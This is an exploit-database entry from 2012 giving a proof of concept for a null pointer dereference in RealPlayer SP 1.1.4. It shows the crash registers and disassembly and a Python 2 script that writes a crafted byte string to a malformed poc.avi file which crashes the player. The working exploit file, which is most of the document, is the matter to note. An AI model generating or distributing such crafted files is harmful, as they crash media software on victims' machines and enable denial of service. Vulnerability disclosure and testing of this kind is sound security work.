RealPlayer (.avi) Null Pointer Dereference PoC



EKU-ID: 1869 CVE: OSVDB-ID:
Author: Senator of Pirates Published: 2012-04-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Application :   RealPlayer (.avi) Null Pointer Dereference PoC
Versions :   SP 1.1.4 (Build 12.0.0.756)
Date :   05/04/2012
Tested :   Windows XP SP3 EN
Auther :   Senator of Pirates
E-Mail :   Senator.of.Pirates.team@gmail.com
FaceBook :   /SenatorofPirates

Bug :
----
  Register:

  EAX 00000000
  ECX 00000006
  EDX 61B1302C vidplin.61B1302C
  EBX 01666548
  ESP 0012E328
  EBP 0012E340
  ESI 00000000
  EDI 00000000
  EIP 61B00DFF vidplin.61B00DFF

  Disassembly:

  61b00dfc 8b4510          mov     eax,dword ptr [ebp+10h]
  61b00dff 8b10            mov     edx,dword ptr [eax]  ;  access violation when reading 0x00000000

PoC :
-------
DATA = ("\x52\x49\x46\x46\x20\x72\x2E\x01\x41\x56\x49\x20\x4C\x49\x53\x54\x48\x01\x00\x00\x68\x64\x72"
"\x6C\x61\x76\x69\x68\x38\x00\x00\x00\x6A\x04\x01\x00\x78\x0F\x05\x00\x00\x00\x00\x00\x10\x00"
"\x01\x00\xA5\x03\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\xA4\x01\x00\x40\x01\x00\x00\xF0"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54"
"\x74\x00\x00\x00\x73\x74\x72\x6C\x73\x74\x72\x68\x38\x00\x00\x00\x76\x69\x64\x73\x6D\x6A\x70"
"\x67\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6A\x04\x01\x00\x40\x42\x0F\x00\x00\x00"
"\x00\x00\xB1\x03\x00\x00\x00\xA4\x01\x00\x10\x27\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40"
"\x01\xF0\x00\x73\x74\x72\x66\x28\x00\x00\x00\x28\x00\x00\x00\x40\x01\x00\x00\xF0\x00\x00\x00"
"\x01\x00\x18\x00\x4D\x4A\x50\x47\x00\x84\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x5E\x00\x00\x00\x73\x74\x72\x6C\x73\x74\x72\x68\x38\x00"
"\x00\x00\x61\x75\x64\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"
"\x00\x00\x00\x40\x1F\x00\x00\x00\x00\x00\x00\xC0\xB0\x07\x00\x80\x3E\x00\x00\x10\x27\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x74\x72\x66\x12\x00\x1E\x00\x01\x00\x01"
"\x00\x40\x1F\x00\x00\x40\x1F\x00\x00\x01\x00\x08\x00\x00\x00\x49\x44\x49\x54\x1A\x00\x00\x00"
"\x53\x61\x74\x20\x41\x75\x67\x20\x20\x37\x20\x31\x32\x3A\x35\x34\x3A\x30\x32\x20\x32\x30\x31"
"\x30\x0A\x00\x4C\x49\x53\x54\x34\x00\x00\x00\x49\x4E\x46\x4F\x49\x53\x46\x54\x28\x00\x00\x00"
"\x4F\x4C\x59\x4D\x50\x55\x53\x20\x46\x45\x33\x32\x30\x2C\x58\x38\x33\x35\x2C\x43\x35\x34\x30"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4A\x55\x4E\x4B\x54\x2E"
"\x00\x00\x4F\x4C\x59\x4D\x44\x69\x67\x69\x74\x61\x6C\x20\x43\x61\x6D\x65\x72\x61\x4F\x4C\x59"
"\x4D\x50\x55\x53\x20\x44\x49\x47\x49\x54\x41\x4C\x20\x43\x41\x4D\x45\x52\x41\x00\x00\x01\x00"
"\x44\x34\x33\x36\x33\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00");

avi = open('poc.avi', 'wb+')
avi.write(DATA)
   
avi.close()
print "[-] AVI file generated"